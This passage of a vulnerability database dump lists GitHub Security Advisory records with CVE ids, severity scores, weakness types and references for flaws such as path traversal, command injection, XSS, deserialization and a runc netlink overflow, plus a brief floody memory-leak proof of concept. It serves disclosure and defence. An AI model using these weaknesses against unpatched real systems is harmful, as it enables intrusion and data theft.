{'https://github.com/advisories/GHSA-4vp3-vfww-8648', 'https://nvd.nist.gov/vuln/detail/CVE-2020-29454', 'https://github.com/umbraco/Umbraco-CMS/pull/9361'}
null
GHSA
GHSA-g86w-v5vg-9gxf
Directory traversal attack in Spring Cloud Config
Spring Cloud Config, versions 2.2.x prior to 2.2.2, versions 2.1.x prior to 2.1.7, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack.
{'CVE-2020-5405'}
2021-08-25T22:01:26Z
2020-06-05T16:11:36Z
MODERATE
6.5
{'CWE-23', 'CWE-22'}
{'https://github.com/advisories/GHSA-g86w-v5vg-9gxf', 'https://pivotal.io/security/cve-2020-5405', 'https://nvd.nist.gov/vuln/detail/CVE-2020-5405'}
null
GHSA
GHSA-37hx-4mcq-wc3h
Weak Password Recovery Mechanism for Forgotten Password in Strapi
In Strapi through 3.6.0, the admin panel allows the changing of one's own password without entering the current password. An attacker who gains access to a valid session can use this to take over an account by changing the password.
{'CVE-2021-28128'}
2021-10-06T17:48:16Z
2021-10-06T17:48:16Z
HIGH
8.1
{'CWE-640'}
{'https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-008.txt', 'https://github.com/advisories/GHSA-37hx-4mcq-wc3h', 'https://github.com/strapi/strapi/releases', 'https://strapi.io/changelog', 'https://nvd.nist.gov/vuln/detail/CVE-2021-28128', 'https://github.com/strapi/strapi/issues/9657'}
null
GHSA
GHSA-v95c-p5hm-xq8f
Overflow in netlink bytemsg length field allows attacker to override netlink-based container configuration
### Impact In runc, [netlink](https://www.man7.org/linux/man-pages/man7/netlink.7.html) is used internally as a serialization system for specifying the relevant container configuration to the C portion of our code (responsible for the based namespace setup of containers). In all versions of runc prior to 1.0.3, the encoder did not handle the possibility of an integer overflow in the 16-bit length field for the byte array attribute type, meaning that a large enough malicious byte array attribute could result in the length overflowing and the attribute contents being parsed as netlink messages for container configuration. This vulnerability requires the attacker to have some control over the configuration of the container and would allow the attacker to bypass the namespace restrictions of the container by simply adding their own netlink payload which disables all namespaces. Prior to 9c444070ec7bb83995dbc0185da68284da71c554, in practice it was fairly difficult to specify an arbitrary-length netlink message with most container runtimes. The only user-controlled byte array was the namespace paths attributes which can be specified in runc's `config.json`, but as far as we can tell no container runtime gives raw access to that configuration setting -- and having raw access to that setting **would allow the attacker to disable namespace protections entirely anyway** (setting them to `/proc/1/ns/...` for instance). In addition, each namespace path is limited to 4096 bytes (with only 7 namespaces supported by runc at the moment) meaning that even with custom namespace paths it appears an attacker still cannot shove enough bytes into the netlink bytemsg in order to overflow the uint16 counter. However, out of an abundance of caution (given how old this bug is) we decided to treat it as a potentially exploitable vulnerability with a low severity. After 9c444070ec7bb83995dbc0185da68284da71c554 (which was not present in any release of runc prior to the discovery of this bug), all mount paths are included as a giant netlink message which means that this bug becomes significantly more exploitable in more reasonable threat scenarios. The main users impacted are those who allow untrusted images with untrusted configurations to run on their machines (such as with shared cloud infrastructure), though as mentioned above it appears this bug was not practically exploitable on any released version of runc to date. ### Patches The patch for this is d72d057ba794164c3cce9451a00b72a78b25e1ae and runc 1.0.3 was released with this bug fixed. ### Workarounds To the extent this is exploitable, disallowing untrusted namespace paths in container configuration should eliminate all practical ways of exploiting this bug. It should be noted that untrusted namespace paths would allow the attacker to disable namespace protections entirely even in the absence of this bug. ### References * commit d72d057ba794 ("runc init: avoid netlink message length overflows") * https://bugs.chromium.org/p/project-zero/issues/detail?id=2241 ### Credits Thanks to Felix Wilhelm from Google Project Zero for discovering and reporting this vulnerability. In particular, the fact they found this vulnerability so quickly, before we made a 1.1 release of runc (which would've been vulnerable) was quite impressive. ### For more information If you have any questions or comments about this advisory: * Open an issue in [our repo](https://github.com/opencontainers/runc)
{'CVE-2021-43784'}
2022-04-19T19:03:16Z
2021-12-07T21:22:39Z
MODERATE
6
{'CWE-190'}
{'https://github.com/opencontainers/runc/commit/f50369af4b571e358f20b139eea52d612eb55eed', 'https://lists.debian.org/debian-lts-announce/2021/12/msg00005.html', 'https://github.com/opencontainers/runc/commit/9c444070ec7bb83995dbc0185da68284da71c554', 'https://github.com/advisories/GHSA-v95c-p5hm-xq8f', 'https://github.com/opencontainers/runc/security/advisories/GHSA-v95c-p5hm-xq8f', 'https://nvd.nist.gov/vuln/detail/CVE-2021-43784', 'https://github.com/opencontainers/runc/commit/d72d057ba794164c3cce9451a00b72a78b25e1ae', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=2241'}
null
GHSA
GHSA-gmrf-99gw-vvwj
/user/sessions endpoint allows detecting valid accounts
This Security Advisory is about a vulnerability in eZ Platform v1.13, v2.5, and v3.2, and in Ibexa DXP and Ibexa Open Source v3.3. The /user/sessions endpoint can let an attacker detect if a given username or email refers to a valid account. This can be detected through differences in the response data or response time of certain requests. The fix ensures neither attack is possible. The fix is distributed via Composer. If you come across a security issue in our products, here is how you can report it to us: https://doc.ibexa.co/en/latest/guide/reporting_issues/#toc
null
2021-03-11T17:42:08Z
2021-03-11T17:42:08Z
HIGH
0
{'CWE-203'}
{'https://github.com/ezsystems/ezpublish-kernel/commit/b496f073c3f03707d3531a6941dc098b84e3cbed', 'https://github.com/ezsystems/ezpublish-kernel/security/advisories/GHSA-gmrf-99gw-vvwj', 'https://github.com/advisories/GHSA-gmrf-99gw-vvwj', 'https://packagist.org/packages/ezsystems/ezpublish-kernel'}
null
GHSA
GHSA-6m4r-m3gc-h4r5
OS Command Injection in install-package
install-package through 0.4.0 is vulnerable to Command Injection. It allows execution of arbitrary commands via the options argument.
{'CVE-2020-7629'}
2022-02-10T23:48:06Z
2022-02-10T23:48:06Z
CRITICAL
9.8
{'CWE-78'}
{'https://github.com/1000ch/install-package/blob/master/index.js#L82,', 'https://github.com/advisories/GHSA-6m4r-m3gc-h4r5', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7629', 'https://snyk.io/vuln/SNYK-JS-INSTALLPACKAGE-564267'}
null
GHSA
GHSA-3p92-886g-qxpq
Remote Memory Exposure in floody
Versions of `floody` before 0.1.1 are vulnerable to remote memory exposure. .write(number)` in the affected `floody` versions passes a number to Buffer constructor, appending a chunk of uninitialized memory. Proof of Concept: ``` var f = require('floody')(process.stdout); f.write(USERSUPPLIEDINPUT); 'f.stop(); ## Recommendation Update to version 0.1.1 or later.
null
2021-08-04T21:27:04Z
2019-06-04T15:42:32Z
MODERATE
5.1
{'CWE-201'}
{'https://www.npmjs.com/advisories/601', 'https://snyk.io/vuln/npm:floody:20160115', 'https://github.com/soldair/node-floody/commit/6c44722312131f4ac8a1af40f0f861c85efe01b0', 'https://github.com/advisories/GHSA-3p92-886g-qxpq'}
null
GHSA
GHSA-f98m-q3hr-p5wq
Prototype Pollution in locutus
All versions of package locutus prior to version 2.0.12 are vulnerable to Prototype Pollution via the php.strings.parse_str function.
{'CVE-2020-7719'}
2021-12-14T15:33:30Z
2021-05-06T18:12:22Z
CRITICAL
9.8
{'CWE-20', 'CWE-915'}
{'https://snyk.io/vuln/SNYK-JS-LOCUTUS-598675', 'https://github.com/kvz/locutus/pull/418/', 'https://github.com/advisories/GHSA-f98m-q3hr-p5wq', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7719', 'https://github.com/locutusjs/locutus/commit/0eb16d8541838e80f3c2340a9ef93ded7c97290f'}
null
GHSA
GHSA-xwjh-cp99-cj8q
Path Traversal in cordova-plugin-ionic-webview
Versions of `cordova-plugin-ionic-webview` prior to 2.2.0 are vulnerable to Path Traversal, allowing attackers access to OS local files that should be inaccessible by third-party applications. The package launches a webserver listening on http://localhost:8080 without restricting access of the app itself, thus escaping the iOS application sandbox and accessing local files. ## Recommendation Upgrade to version 2.2.0
{'CVE-2018-16202'}
2021-09-22T18:20:58Z
2019-02-12T15:36:35Z
HIGH
8.6
{'CWE-22'}
{'http://jvn.jp/en/jp/JVN60497148/index.html', 'https://github.com/ionic-team/cordova-plugin-ionic-webview', 'https://nvd.nist.gov/vuln/detail/CVE-2018-16202', 'https://github.com/advisories/GHSA-xwjh-cp99-cj8q', 'https://jvn.jp/en/jp/JVN69812763/index.html', 'https://www.npmjs.com/advisories/746'}
null
GHSA
GHSA-pvx3-gm3c-gmpr
Denial of Service in Go-Ethereum
A design flaw in Go-Ethereum 1.10.12 and older versions allows an attacker node to send 5120 future transactions with a high gas price in one message, which can purge all of pending transactions in a victim node's memory pool, causing a denial of service (DoS).
{'CVE-2022-23327'}
2022-03-18T20:06:44Z
2022-03-05T00:00:46Z
HIGH
7.5
null
{'https://github.com/advisories/GHSA-pvx3-gm3c-gmpr', 'http://ethereum.com', 'https://tristartom.github.io/docs/ccs21.pdf', 'https://nvd.nist.gov/vuln/detail/CVE-2022-23327', 'http://go-ethereum.com', 'https://dl.acm.org/doi/pdf/10.1145/3460120.3485369'}
null
GHSA
GHSA-9vg3-cf92-h2h7
Insufficient Verification of Data Authenticity in python-keystoneclient
python-keystoneclient version 0.2.3 to 0.2.5 has middleware memcache signing bypass
{'CVE-2013-2167'}
2022-03-23T19:48:28Z
2020-03-10T20:39:05Z
CRITICAL
9.8
{'CWE-345'}
{'https://security-tracker.debian.org/tracker/CVE-2013-2167', 'http://www.securityfocus.com/bid/60680', 'http://rhn.redhat.com/errata/RHSA-2013-0992.html', 'https://nvd.nist.gov/vuln/detail/CVE-2013-2167', 'https://github.com/advisories/GHSA-9vg3-cf92-h2h7', 'https://github.com/openstack/python-keystoneclient/commits/0.3.0', 'https://bugs.gentoo.org/show_bug.cgi?id=CVE-2013-2167', 'https://access.redhat.com/security/cve/cve-2013-2167', 'http://www.openwall.com/lists/oss-security/2013/06/19/5', 'https://github.com/openstack/python-keystoneclient/commit/eeefb784f24c37d5f56a421e1ccc911cace9385e', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-2167', 'http://lists.fedoraproject.org/pipermail/package-announce/2013-August/113944.html', 'https://exchange.xforce.ibmcloud.com/vulnerabilities/85492'}
null
GHSA
GHSA-86vp-x3pr-79rx
Cross-site scripting in Apache airflow
The "origin" parameter passed to some of the endpoints like '/trigger' was vulnerable to XSS exploit. This issue affects Apache Airflow versions prior to 1.10.14. This is same as CVE-2020-13944 but the implemented fix in Airflow 1.10.13 did not fix the issue completely.
{'CVE-2020-17515'}
2021-05-06T15:08:53Z
2021-04-20T16:40:14Z
MODERATE
6.1
{'CWE-79'}
{'https://lists.apache.org/thread.html/ra8ce70088ba291f358e077cafdb14d174b7a1ce9a9d86d1b332d6367@%3Cusers.airflow.apache.org%3E', 'https://github.com/apache/airflow/pull/14738', 'http://www.openwall.com/lists/oss-security/2020/12/11/2', 'https://pypi.org/project/apache-airflow', 'https://lists.apache.org/thread.html/r2892ef594dbbf54d0939b808626f52f7c2d1584f8aa1d81570847d2a@%3Cusers.airflow.apache.org%3E', 'https://lists.apache.org/thread.html/r2892ef594dbbf54d0939b808626f52f7c2d1584f8aa1d81570847d2a@%3Cannounce.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-17515', 'http://www.openwall.com/lists/oss-security/2021/05/01/2', 'https://lists.apache.org/thread.html/r4656959c8ed06c1f6202d89aa4e67b35ad7bdba5a666caff3fea888e@%3Cusers.airflow.apache.org%3E', 'https://github.com/apache/airflow/commit/409c249121bd9c8902fc2ba551b21873ab41f953', 'https://github.com/apache/airflow/releases/tag/2.0.2', 'https://lists.apache.org/thread.html/rc005f4de9d9b0ba943ceb8ff5a21a5c6ff8a9df52632476698d99432@%3Cannounce.apache.org%3E', 'https://github.com/apache/airflow/releases/tag/1.10.15', 'https://github.com/advisories/GHSA-86vp-x3pr-79rx', 'https://lists.apache.org/thread.html/r4656959c8ed06c1f6202d89aa4e67b35ad7bdba5a666caff3fea888e%40%3Cusers.airflow.apache.org%3E', 'https://lists.apache.org/thread.html/r2892ef594dbbf54d0939b808626f52f7c2d1584f8aa1d81570847d2a@%3Cdev.airflow.apache.org%3E'}
null
GHSA
GHSA-4w97-57v2-3w44
False-negative validation results in MINT transactions with invalid baton
### Impact Users could experience false-negative validation outcomes for [MINT](https://github.com/simpleledger/slp-specifications/blob/master/slp-token-type-1.md#mint---extended-minting-transaction) transaction operations. A poorly implemented SLP wallet could allow spending of the affected tokens which would result in the destruction of a user's minting baton. ### Patches npm package [slp-validate](https://www.npmjs.com/package/slp-validate) has been patched and published as version 1.2.1. ### Workarounds Upgrade to slp-validate 1.2.1. ### References * slp-validate [commit](https://github.com/simpleledger/slp-validate/commit/cde95c0c6470dceb4f023cd462f904135ebd73e7) ### For more information If you have any questions or comments about this advisory: * Open an issue in [slp-validate](https://github.com/simpleledger/slp-validate/issues)
{'CVE-2020-11072'}
2021-01-08T20:17:37Z
2020-05-12T00:45:24Z
CRITICAL
8.6
{'CWE-697'}
{'https://github.com/simpleledger/slp-validate.js/security/advisories/GHSA-4w97-57v2-3w44', 'https://github.com/advisories/GHSA-4w97-57v2-3w44', 'https://github.com/simpleledger/slp-validate/security/advisories/GHSA-4w97-57v2-3w44', 'https://github.com/simpleledger/slp-validate/commit/cde95c0c6470dceb4f023cd462f904135ebd73e7', 'https://nvd.nist.gov/vuln/detail/CVE-2020-11072'}
null
GHSA
GHSA-6268-v434-45m5
Cross-site Scripting in Grav
Grav through 1.6.15 allows (Stored) Cross-Site Scripting due to JavaScript execution in SVG images.
{'CVE-2019-16126'}
2021-08-17T22:39:50Z
2019-11-08T20:06:08Z
MODERATE
6.1
{'CWE-79'}
{'https://github.com/advisories/GHSA-6268-v434-45m5', 'https://nvd.nist.gov/vuln/detail/CVE-2019-16126', 'https://github.com/getgrav/grav/issues/2657'}
null
GHSA
GHSA-9c29-9h4m-wg5p
Users can view database names in Apache Superset
In Apache Incubator Superset before 0.32, a user can view database names that he has no access to on a dropdown list in SQLLab
{'CVE-2019-12414'}
2021-08-19T19:25:35Z
2020-02-26T19:55:14Z
MODERATE
5.3
{'CWE-200'}
{'https://lists.apache.org/thread.html/396034aabe08dd349ff44eb062c718aadcf1b4e86f6372c7d5e988c0%40%3Cdev.superset.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2019-12414', 'https://github.com/advisories/GHSA-9c29-9h4m-wg5p'}
null
GHSA
GHSA-22cm-3qf2-2wc7
LDAP Injection in is-user-valid
All versions of package is-user-valid are vulnerable to LDAP Injection which can lead to either authentication bypass or information exposure.
{'CVE-2021-23335'}
2021-04-13T15:30:27Z
2021-04-13T15:30:27Z
HIGH
7.5
{'CWE-74', 'CWE-90'}
{'https://snyk.io/vuln/SNYK-JS-ISUSERVALID-1056766', 'https://github.com/advisories/GHSA-22cm-3qf2-2wc7', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23335'}
null
GHSA
GHSA-xwgq-pcqx-hpmv
URL Redirection to Untrusted Site (Open Redirect) in Ktor
In Ktor through 1.2.6, the client resends data from the HTTP Authorization header to a redirect location.
{'CVE-2019-19703'}
2021-08-19T16:56:46Z
2020-02-12T18:45:50Z
MODERATE
6.1
{'CWE-601'}
{'https://github.com/ktorio/ktor/issues/1467', 'https://nvd.nist.gov/vuln/detail/CVE-2019-19703', 'https://github.com/advisories/GHSA-xwgq-pcqx-hpmv', 'https://github.com/ktorio/ktor/commit/0c108156f45423d09014b47be810188629cb878f'}
null
GHSA
GHSA-gwrj-88fp-5m36
Code injection in Narou
Narou (aka Narou.rb) before 3.8.0 allows Ruby Code Injection via the title name or author name of a novel.
{'CVE-2021-35514'}
2021-07-02T18:36:01Z
2021-07-02T18:36:01Z
HIGH
8.5
{'CWE-94'}
{'https://vuln.ryotak.me/advisories/51', 'https://github.com/whiteleaf7/narou/commit/d07720e855293182563b749431dfbf6c2d1cdb42', 'https://nvd.nist.gov/vuln/detail/CVE-2021-35514', 'https://github.com/advisories/GHSA-gwrj-88fp-5m36', 'https://github.com/whiteleaf7/narou/blob/develop/ChangeLog.md#380-20210627'}
null
GHSA
GHSA-6m9g-jr8c-cqw3
Depth counting error in guard() leading to multiple potential security issues in aioxmpp
### Impact Possible remote Denial of Service or Data Injection. ### Patches Patches are available in https://github.com/horazont/aioxmpp/pull/268. They have been backported to the 0.10 release series and 0.10.3 is the first release to contain the fix. ### Workarounds To make the bug exploitable, an error suppressing ``xso_error_handler`` is required. By not using ``xso_error_handlers`` or not using the suppression function, the vulnerability can be mitigated completely (to our knowledge). ### References The pull request contains a detailed description: https://github.com/horazont/aioxmpp/pull/268 ### For more information If you have any questions or comments about this advisory: * [Join our chat](xmpp:aioxmpp@conference.zombofant.net?join) * Email the maintainer [Jonas Schäfer](mailto:jonas@wielicki.name)
{'CVE-2019-1000007'}
2021-07-26T23:48:58Z
2020-04-29T17:12:39Z
HIGH
7.4
{'CWE-237'}
{'https://github.com/horazont/aioxmpp/pull/268', 'https://nvd.nist.gov/vuln/detail/CVE-2019-1000007', 'https://github.com/advisories/GHSA-6m9g-jr8c-cqw3', 'https://github.com/horazont/aioxmpp/commit/29ff0838a40f58efe30a4bbcea95aa8dab7da475', 'https://github.com/horazont/aioxmpp/commit/f151f920f439d97d4103fc11057ed6dc34fe98be', 'https://github.com/horazont/aioxmpp/security/advisories/GHSA-6m9g-jr8c-cqw3'}
null
GHSA
GHSA-jc83-cpf9-q7c6
False-negative validation results in MINT transactions with invalid baton
### Impact Users could experience false-negative validation outcomes for [MINT](https://github.com/simpleledger/slp-specifications/blob/master/slp-token-type-1.md#mint---extended-minting-transaction) transaction operations. A poorly implemented SLP wallet could allow spending of the affected tokens which would result in the destruction of a user's minting baton. ### Patches npm package [slpjs](https://www.npmjs.com/package/slpjs) has been patched and published as version 0.27.2. ### Workarounds Upgrade to slpjs 0.27.2. ### References * slpjs [commit](https://github.com/simpleledger/slpjs/commit/3671be2ffb6d4cfa94c00c6dc8649d1ba1d75754) ### For more information If you have any questions or comments about this advisory: * Open an issue in [slp-validate](https://github.com/simpleledger/slp-validate/issues) or [slpjs](https://github.com/simpleledger/slpjs/issues)
{'CVE-2020-11071'}
2021-01-08T20:17:32Z
2020-05-12T00:39:03Z
CRITICAL
8.6
{'CWE-697'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-11071', 'https://github.com/simpleledger/slpjs/commit/3671be2ffb6d4cfa94c00c6dc8649d1ba1d75754', 'https://github.com/simpleledger/slpjs/security/advisories/GHSA-jc83-cpf9-q7c6', 'https://github.com/advisories/GHSA-jc83-cpf9-q7c6'}
null
GHSA
GHSA-4936-rj25-6wm6
High severity vulnerability that affects nori
The nori gem 2.0.x before 2.0.2, 1.1.x before 1.1.4, and 1.0.x before 1.0.3 for Ruby does not properly restrict casts of string values, which allows remote attackers to conduct object-injection attacks and execute arbitrary code, or cause a denial of service (memory and CPU consumption) involving nested XML entity references, by leveraging Action Pack support for (1) YAML type conversion or (2) Symbol type conversion, a similar vulnerability to CVE-2013-0156.
{'CVE-2013-0285'}
2021-08-31T21:49:15Z
2017-10-24T18:33:37Z
HIGH
0
{'CWE-20'}
{'https://nvd.nist.gov/vuln/detail/CVE-2013-0285', 'http://seclists.org/oss-sec/2013/q1/304', 'https://support.cloud.engineyard.com/entries/22915701-january-14-2013-security-vulnerabilities-httparty-extlib-crack-nori-update-these-gems-immediately', 'https://github.com/advisories/GHSA-4936-rj25-6wm6'}
null
GHSA
GHSA-6xv6-jpvw-cx6q
Command injection in bestzip
The package bestzip before 2.1.7 are vulnerable to Command Injection via the options param.
{'CVE-2020-7730'}
2021-07-29T22:26:00Z
2021-05-06T18:27:36Z
CRITICAL
9.8
{'CWE-78'}
{'https://snyk.io/vuln/SNYK-JS-BESTZIP-609371', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7730', 'https://github.com/nfriedly/node-bestzip/commit/45d4a901478c6a8f396c8b959dd6cf8fd3f955b6', 'https://github.com/advisories/GHSA-6xv6-jpvw-cx6q'}
null
GHSA
GHSA-8rx6-v5q4-xw3j
XML External Entity Reference in Jenkins Coverage/Complexity Scatter Plot Plugin
Jenkins Coverage/Complexity Scatter Plot Plugin 1.1.1 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
{'CVE-2022-28154'}
2022-04-12T21:58:25Z
2022-03-30T00:00:23Z
HIGH
8.1
{'CWE-611'}
{'https://www.jenkins.io/security/advisory/2022-03-29/#SECURITY-1899', 'https://nvd.nist.gov/vuln/detail/CVE-2022-28154', 'https://github.com/advisories/GHSA-8rx6-v5q4-xw3j', 'http://www.openwall.com/lists/oss-security/2022/03/29/1'}
null
GHSA
GHSA-rcj2-vvjx-87pm
Missing Encryption of Sensitive Data in arrow-kt Arrow
arrow-kt Arrow before 0.9.0 resolved Gradle build artifacts (for compiling and building the published JARs) over HTTP instead of HTTPS. Any of these dependent artifacts could have been maliciously compromised by an MITM attack.
{'CVE-2019-11404'}
2021-05-11T14:57:29Z
2019-04-22T17:15:40Z
MODERATE
5.9
{'CWE-311'}
{'https://github.com/arrow-kt/arrow/issues/1310', 'https://github.com/arrow-kt/ank/issues/35', 'https://github.com/advisories/GHSA-rcj2-vvjx-87pm', 'https://github.com/arrow-kt/arrow/releases/tag/0.9.0', 'https://github.com/arrow-kt/ank/pull/36', 'https://nvd.nist.gov/vuln/detail/CVE-2019-11404', 'https://github.com/arrow-kt/arrow/commit/74198dab522393487d5344f194dc21208ab71ae8'}
null
GHSA
GHSA-6hgm-866r-3cjv
Insecure Deserialization in Apache Commons Collection
Serialized-object interfaces in Java applications using the Apache Commons Collections (ACC) library may allow remote attackers to execute arbitrary commands via a crafted serialized Java object.
{'CVE-2015-6420'}
2020-06-15T20:36:20Z
2020-06-15T20:36:20Z
HIGH
0
null
{'https://www.kb.cert.org/vuls/id/581311', 'http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization', 'https://github.com/advisories/GHSA-6hgm-866r-3cjv', 'https://nvd.nist.gov/vuln/detail/CVE-2015-6420', 'https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05376917', 'http://www.securityfocus.com/bid/78872', 'https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05390722', 'http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html', 'https://www.tenable.com/security/research/tra-2017-23', 'https://www.tenable.com/security/research/tra-2017-14'}
null
GHSA
GHSA-r6cm-wg48-rh2r
Exposure of Private Personal Information to an Unauthorized Actor in alextselegidis/easyappointments
The software is a booking management system that has a public form to place bookings, and a private area for the calendar and management of services, users, settings, etc. There is a backend API that allows data manipulation, including listing the appointments for a specific time range. This happens on this endpoint: /index.php/backend_api/ajax_get_calendar_events Unfortunately, there is no authentication / permissions-check on that endpoint, the only required parameters in a POST request are "startDate", "endDate" and "csrfToken". Because the csrfToken can be obtained by any unauthenticated user just visiting the public form (and is valid for the backend as well), any attacker can query the backend API and obtain all sorts of private information about the appointment, in JSON format.
{'CVE-2022-0482'}
2022-04-17T17:13:16Z
2022-03-10T00:00:40Z
CRITICAL
9.1
{'CWE-863', 'CWE-359'}
{'http://packetstormsecurity.com/files/166701/Easy-Appointments-Information-Disclosure.html', 'https://github.com/alextselegidis/easyappointments/commit/44af526a6fc5e898bc1e0132b2af9eb3a9b2c466', 'https://github.com/alextselegidis/easyappointments/releases/tag/1.4.3', 'https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0482', 'https://github.com/advisories/GHSA-r6cm-wg48-rh2r', 'https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26'}
null
GHSA
GHSA-92v9-xh2q-fq9f
Prototype Pollution in @cookiex/deep
The npm @cookiex/deep package before version 0.0.7 has a prototype pollution vulnerability. The global proto object can be polluted using the __proto__ object.
{'CVE-2021-23442'}
2021-09-29T18:06:08Z
2021-09-20T20:12:38Z
HIGH
8.6
{'CWE-1321', 'CWE-915'}
{'https://github.com/tony-tsx/cookiex-deep/issues/1', 'https://github.com/tony-tsx/cookiex-deep/commit/b5bea2b7f34a5fa9abb4446cbd038ecdbcd09c88', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23442', 'https://snyk.io/vuln/SNYK-JS-COOKIEXDEEP-1582793', 'https://github.com/advisories/GHSA-92v9-xh2q-fq9f'}
null
GHSA
GHSA-m884-279h-32v2
Exceptions displayed in non-debug configurations in Symfony
Description ----------- When `ErrorHandler` renders an exception HTML page, it uses un-escaped properties from the related Exception class to render the stacktrace. The security issue comes from the fact that the stacktraces were also displayed in non-`debug` environments. Resolution ---------- The `ErrorHandler` class now escapes all properties coming from the related Exception, and the stacktrace is not displayed anymore in non-`debug` environments. The patches for this issue are available [here](https://github.com/symfony/symfony/commit/cf80224589ac05402d4f72f5ddf80900ec94d5ad) and [here](https://github.com/symfony/symfony/commit/629d21b800a15dc649fb0ae9ed7cd9211e7e45db) for branch 4.4. Credits ------- I would like to thank Luka Sikic for reporting & Yonel Ceruto and Jérémy Derussé for fixing the issue.
{'CVE-2020-5274'}
2022-04-19T19:02:57Z
2020-03-30T20:09:31Z
MODERATE
4.6
{'CWE-209'}
{'https://github.com/symfony/symfony/commit/cf80224589ac05402d4f72f5ddf80900ec94d5ad', 'https://nvd.nist.gov/vuln/detail/CVE-2020-5274', 'https://github.com/symfony/symfony/security/advisories/GHSA-m884-279h-32v2', 'https://github.com/symfony/symfony/commit/629d21b800a15dc649fb0ae9ed7cd9211e7e45db', 'https://github.com/advisories/GHSA-m884-279h-32v2'}
null
GHSA
GHSA-39cx-xcwj-3rc4
Cross-Site Scripting in dojo
Affected versions of `dojo` are susceptible to a cross-site scripting vulnerability in the `dijit.Editor` and `textarea` components, which execute their contents as Javascript, even when sanitized. ## Recommendation Update to version 1.1 or later.
{'CVE-2008-6681'}
2021-09-23T21:27:05Z
2020-09-01T15:25:29Z
MODERATE
0
{'CWE-79'}
{'https://github.com/advisories/GHSA-39cx-xcwj-3rc4', 'https://www.npmjs.com/advisories/107', 'https://nvd.nist.gov/vuln/detail/CVE-2008-6681', 'http://trac.dojotoolkit.org/ticket/2140', 'http://www.securityfocus.com/bid/34661', 'https://bugs.dojotoolkit.org/ticket/2140', 'https://exchange.xforce.ibmcloud.com/vulnerabilities/49883', 'http://www.dojotoolkit.org/book/dojo-1-1-release-notes'}
null
GHSA
GHSA-wrr7-33fx-rcvj
Deserialization of Untrusted Data in jackson-databind
**Withdrawn:** Duplicate of GHSA-cjjf-94ff-43w7
{'CVE-2018-12022'}
2020-06-16T20:28:16Z
2020-06-15T18:44:56Z
HIGH
0
null
{'https://www.debian.org/security/2019/dsa-4452', 'https://lists.apache.org/thread.html/7fcf88aff0d1deaa5c3c7be8d58c05ad7ad5da94b59065d8e7c50c5d@%3Cissues.lucene.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2018-12022', 'https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a', 'https://access.redhat.com/errata/RHSA-2019:2804', 'https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E', 'https://access.redhat.com/errata/RHBA-2019:0959', 'https://seclists.org/bugtraq/2019/May/68', 'https://access.redhat.com/errata/RHSA-2019:4037', 'https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html', 'https://access.redhat.com/errata/RHSA-2019:0782', 'https://access.redhat.com/errata/RHSA-2019:1107', 'http://www.securityfocus.com/bid/107585', 'https://access.redhat.com/errata/RHSA-2019:1140', 'https://access.redhat.com/errata/RHSA-2019:3892', 'https://github.com/advisories/GHSA-wrr7-33fx-rcvj', 'https://access.redhat.com/errata/RHSA-2019:1108', 'https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E', 'https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E', 'https://github.com/FasterXML/jackson-databind/issues/2052', 'https://access.redhat.com/errata/RHSA-2019:3002', 'https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062', 'https://access.redhat.com/errata/RHSA-2019:2858', 'https://access.redhat.com/errata/RHSA-2019:0877', 'https://access.redhat.com/errata/RHSA-2019:3149', 'https://access.redhat.com/errata/RHSA-2019:3140', 'https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf', 'https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html', 'https://access.redhat.com/errata/RHSA-2019:1823', 'https://security.netapp.com/advisory/ntap-20190530-0003/', 'https://bugzilla.redhat.com/show_bug.cgi?id=1671098', 'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://access.redhat.com/errata/RHSA-2019:1797', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZEDLDUYBSTDY4GWDBUXGJNS2RFYTFVRC/', 'https://access.redhat.com/errata/RHSA-2019:1822', 'https://access.redhat.com/errata/RHSA-2019:1782', 'https://access.redhat.com/errata/RHSA-2019:1106'}
null
GHSA
GHSA-xp6v-qx65-4pp7
Data races in gfwx
An issue was discovered in the gfwx crate before 0.3.0 for Rust. Because ImageChunkMut does not have bounds on its Send trait or Sync trait, a data race and memory corruption can occur.
{'CVE-2020-36211'}
2021-08-25T20:50:39Z
2021-08-25T20:50:39Z
HIGH
7
{'CWE-662', 'CWE-787'}
